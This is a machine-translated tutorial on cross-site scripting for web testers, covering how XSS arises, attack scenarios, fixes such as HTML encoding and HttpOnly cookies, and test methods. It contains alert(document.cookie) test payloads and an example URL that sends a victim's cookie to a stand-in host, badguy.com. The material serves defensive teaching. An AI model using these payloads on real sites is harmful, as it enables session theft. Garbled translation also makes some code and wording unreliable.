XSS for Web Security Testing

Source: Internet
Author: User
Tags html encode alphanumeric characters

Cross Site Scripting (XSS) is the most common vulnerability in Web applications. An attacker embeds a client script (such as JavaScript) in a webpage. When a user browses the webpage, the script is executed in the browser of the user to achieve the target of the attacker. for example, attackers can obtain users' cookies, navigate to malicious websites, and carry Trojans.
As a tester, you need to understand the XSS principles, attack scenarios, and how to fix them. In order to effectively prevent the occurrence of XSS.
 
Reading directory
How does XSS occur?
HTML Encode
XSS attack scenarios
XSS vulnerability repair
How to test XSS vulnerabilities
Differences between HTML Encode and URL Encode
XSS filter in browser
XSS security mechanism in ASP. NET
How does XSS happen?
 
Suppose there is a textbox below
<Input type = "text" name = "address1" value = "value1from">
Value1from is the input from the user. If the user does not enter value1from, but enters "/> <script> alert (document. cookie) </script> <! -Then it will become
<Input type = "text" name = "address1" value = ""/> <script> alert (document. cookie) </script> <! -">
The embedded JavaScript code will be executed.
 
Or if the user inputs "onfocus =" alert (document. cookie ),
<Input type = "text" name = "address1" value = "" onfocus = "alert (document. cookie)">
When an event is triggered, the embedded JavaScript code is executed.
The attack power depends on the script entered by the user.
 
Of course, the data submitted by the user can also be sent to the server through QueryString (in the URL) and Cookie. For example
 
 
HTML Encode
 
XSS occurs because the data entered by the user is changed to code. Therefore, we need to perform HTML Encode processing on user input data. Encode special characters such as "brackets", "single quotes", and "quotation marks.
 
A ready-made method is provided in C #. You only need to call HttpUtility. HtmlEncode ("string <scrui>. (System. Web Assembly needs to be referenced)
Fiddler also provides a convenient tool. Click "TextWizard" on the Toolbar.
 
 
XSS attack scenarios
 
1. Dom-Based XSS vulnerability Attack Process:
Tom found a page in Victim.com with an XSS vulnerability,
Example: http://victim.com/search.asp? Term = apple
The code for the Search. asp page on the server is as follows:
 
<Html>
<Title> </title>
<Body>
Results for <% Reequest. QueryString ("term") %>
...
</Body>
</Html>
 
Tom first sets up a website http://badguy.com to receive "stolen" information.
Then Tom constructs a malicious url (as shown below) and sends it to Monica through some method (email, QQ ).
Http://victim.com/search.asp? Term = <script> window. open ("http://badguy.com? Cookie = "+ document. cookie) </script>
Monica clicks this URL. The malicious Javascript code embedded in the URL will be executed in Monica's browser. Then, the cookie of Monica on the victim.com website will be sent to the badguy website. In this way, the information of Monica in victim.com is stolen by Tom.
 
2. stored XSS (storage-type XSS vulnerability) is a vulnerability that is widely used and may affect the security of Web servers. Attackers can upload attack scripts to Web servers, this makes information leakage possible for all users accessing this page. The attack process is as follows:
 
Alex discovered an XSS vulnerability on website A, which allows the attacker to store the attack code in the database,
Alex published an article that embedded malicious JavaScript code.
When other people access this article, such as Monica, the malicious Javascript code embedded in the article will be executed in her browser, and her session cookie or other information will be stolen by Alex.
 
Dom-Based XSS vulnerabilities threaten individual users, while stored XSS vulnerabilities threaten a large number of users.
 
XSS vulnerability repair
 
Principle: Do not trust customer input data
Note: the attack code is not necessarily in <script> </script>.
Mark important cookies as http only, so that the document. cookie statement in Javascript cannot get cookies.
Only allow users to enter the expected data. For example, in textbox of age, only users can enter numbers. Characters other than numbers are filtered out.
Html Encode processing of data
Filter or remove Special Html tags, such as <script>, <iframe>, & lt; for <, & gt; for>, & quot
Filter tags of JavaScript events. For example, "onclick =", "onfocus", etc.

How to test XSS vulnerabilities
 
Method 1: view the code and find the key variables. The client sends data to the Web server in three ways: Querystring, Form, and cookie. for example, in an ASP program, obtain the client variables through the Request object.
<%
StrUserCode = Request. QueryString ("code ");
StrUser = Request. Form ("USER ");
StrID = Request. Cookies ("ID ");
%>
If the variable has not been htmlEncode processed, this variable has an XSS vulnerability.
 
Method 2: Prepare the test script www.2cto.com.
"/> <Script> alert (document. cookie) </script> <! --
<Script> alert (document. cookie) </script> <! --
"Onclick =" alert (document. cookie)
Enter these test scripts in Textbox or other fields on the webpage to check whether a dialog box is displayed. If yes, the XSS vulnerability exists.
Check the variables in the URL to pass the values to the Web server through the URL, and convert the values of these variables to our test script. Then check whether our script can be executed.
 
Method 3: Automated XSS Vulnerability Testing
There are already many XSS scanning tools. It is very simple to implement XSS automated testing. You only need to use the HttpWebRequest class. Include the xss test script. Send to the Web server. Then, check whether our XSS test script has been injected into HttpWebResponse.

Differences between HTML Encode and URL Encode
 

At the beginning, I always confused these two things. In fact, they are two different things.
As mentioned earlier in HTML encoding, URL encoding is used to comply with url specifications. Because many characters in the standard url specification are not allowed to appear in the url.
For example, search for "test Chinese characters" in baidu ". The URL is changed
Http://www.baidu.com? Wd = % B2 % E2 % CA % D4 % BA % D7 % D6 & rsv_bp = 0 & rsv_spt = 3 & inputT = 7477
 
The so-called URL encoding means that all non-alphanumeric characters will be replaced with a semicolon (%) followed by two hexadecimal numbers, and spaces will be encoded as the plus sign (+)
 
A ready-made method is provided in C #. You only need to call HttpUtility. UrlEncode ("string <scrui>. (System. Web Assembly needs to be referenced)
Fiddler also provides a convenient tool. Click "TextWizard" on the Toolbar.
XSS filter in browser
 

To prevent XSS attacks, many browser vendors add security mechanisms to their browsers to filter XSS. For example, IE8, IE9, Firefox, and Chrome all have security mechanisms for XSS. The browser blocks XSS. For example
 
 
If you need to perform a test, you 'd better use IE7.
XSS security mechanism in ASP. NET
 
ASP. NET has a mechanism to prevent XSS. The submitted form will automatically check whether XSS exists. When a user tries to input XSS code, ASP. NET will throw an error, as shown in
 
Many programmers have no idea about security, and even do not know the existence of XSS. ASP. NET provides default security. In this way, even a programmer without security awareness can write a "safer Website".
To disable this security feature, use <% @ Page validateRequest = "false" %>

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.